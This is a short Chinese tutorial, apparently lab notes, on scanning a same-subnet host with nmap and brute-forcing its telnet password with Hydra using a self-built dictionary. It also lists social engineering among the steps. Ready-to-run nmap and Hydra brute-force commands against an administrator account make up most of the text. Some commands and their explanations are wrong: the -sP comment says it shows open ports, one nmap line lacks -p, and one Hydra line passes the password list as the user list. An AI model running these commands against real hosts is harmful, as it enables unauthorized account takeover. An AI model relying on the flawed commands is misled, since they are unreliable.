扫描和**（在相同的网段中进行)

1. 开一台虚拟机桥接到真实网络中。（一般用vmnet1)
2. 可以ping通baidu.com和虚拟机。
3. 通过nmap的命令来查看自己想要得到。
4. 社会工程学来获取有用的信息。
5. 生成字典（网上找生成字典的工具）
6. 用hydra（九头蛇）来暴力**（安装hydra时需要把hydra放到盘的跟目录下然后用在cmd中指向 hydra的盘符进入hydra中）
7. 暴力**对方的密码

相对应的一些命令 (虚拟机IP 10.1.1.1 真实机IP 10.1.1.100)

    ping baidu.com  
	ping 10.1.1.1
	nmap -sP 10.1.1.1/24(查看10.1.1.1开放了那些端口号)
	nmap -O 10.1.1.1(扫描目标系统版本)
	nmap 21，23 10.1.1.1 -sV（查看开放了什么端口号，和端口号的版本和型号）
	nmap -p 21,23 10.1.1.1 -oN e:\result.txt (扫描后把扫描结果保存到指定文件夹里)
	hydra -l administrator -P e:\pass.txt 10.1.1.1 telnet
    hydra -L pass.txt -P e:\pass.txt 10.1.1.1 telnet 
    // pass.txt是自己生成的字典 //